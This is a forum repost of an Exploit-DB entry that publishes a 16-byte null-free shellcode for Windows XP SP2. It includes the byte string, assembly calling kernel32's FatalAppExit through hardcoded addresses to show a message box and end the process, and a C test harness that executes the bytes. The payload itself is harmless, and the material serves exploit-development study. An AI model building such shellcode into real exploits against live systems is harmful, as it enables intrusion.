Exploit Windows (XP Professional SP2) (English) - MessageBox + Null-Free Shellcode (16 bytes)

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
13581
Проверка EDB
  1. Пройдено
Автор
AODRULEZ
Тип уязвимости
SHELLCODE
Платформа
WINDOWS
CVE
N/A
Дата публикации
2010-01-03
Код:
+-----------------------------------------------------+
| Windows XP Pro Sp2 English "Message-Box" Shellcode. |
+-----------------------------------------------------+

Size         : 16 Bytes, Null-Free.
Author       : Aodrulez. 
Email        : [email protected]



Shellcode = "\xB9\x78\x68\x82\x7C\x33\xC0\xBB"
            "\xF8\x0C\x86\x7C\x51\x50\xFF\xD3"




+--------------+
| Description: |
+--------------+

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
I've used a Function called "FatalAppExit".
The Benefits are Three-Fold!

1] Displays a MessageBox.
2] Terminates the Process. 
3] Its there in Kernel32.dll itself.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





+-----------+
| Asm Code: |
+-----------+

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
shellcode:
 	      mov ecx,7c826878h ;"Admin" string in mem
 	      xor eax,eax
 	      mov ebx,7c860cf8h ;Addr of "FatalAppExit()" 
 		push ecx          ;function from Kernel32
 		push eax          
 		call ebx          ;App does a Clean Exit.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






+-----------------+
| Shellcodetest.c |
+-----------------+

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

char code[] = "\xB9\x78\x68\x82\x7C\x33\xC0\xBB"
              "\xF8\x0C\x86\x7C\x51\x50\xFF\xD3";
 



int main(int argc, char **argv)
{
  
  int (*func)();
  func = (int (*)()) code;
  (int)(*func)();
}

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



+-------------------+
| Greetz Fly Out To |
+-------------------+

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1] Amforked()	 : My Mentor.
2] The Blue Genius : My Boss.
3] www.orchidseven.com
4] str0ke
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

+---------------------------------------------+
| Forgive, O Lord, My Little Jokes on Thee,   |
| and I'll Forgive Thy Great Big Joke on Me.  |
+---------------------------------------------+
 
Источник
www.exploit-db.com

Похожие темы